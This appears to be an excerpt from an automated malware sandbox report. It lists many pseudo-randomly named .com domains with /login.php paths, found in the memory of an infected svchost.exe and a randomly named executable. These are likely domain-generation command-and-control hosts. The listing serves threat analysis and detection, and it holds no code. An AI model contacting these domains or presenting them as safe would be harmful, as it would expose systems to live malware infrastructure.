Source: svchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322419492.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527939785.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2523187509.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512099666.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314873415.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322755404.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydal.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349255775.0000000003379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygop.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjyg.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178063171.000000000923F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388042380.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2399948508.0000000009324000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.0000000000802000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2853769839.000000000988D000.00000004.00000010.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 
00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2676884944.00000000009FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377062429.0000000003357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymup.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypav.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzytap.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzywuq.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxip.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyxyv.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyfup.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhag.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418118048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3421967691.00000000040FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyhuv.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebykul.com/login.php
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344112591.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635305989.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylov.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2896263867.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebylyp.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyniv.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyqeq.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrel.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyrip.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebysul.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyteg.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qebyxyq.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyfog.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyhyl.com/
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311498378.000000000337A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310062012.000000000337A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedyleq.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2653309169.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedylig.com/login.php
Source: svchost.exe, 00000002.00000003.2334241023.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336999342.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynaq.com/login.php
Source: svchost.exe, 00000002.00000003.2587482853.00000000033CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynaq.com/login.php//vofymem.com/
Source: svchost.exe, 00000002.00000003.2853017937.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qedynug.com/http://qeqysap.com/
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyhov.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyhov.com/login.phpE
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetykyq.com/login.php
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647408225.00000000033CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetylip.com/
Source: svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetylip.com/b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetylip.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetynev.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetynev.com/login.php
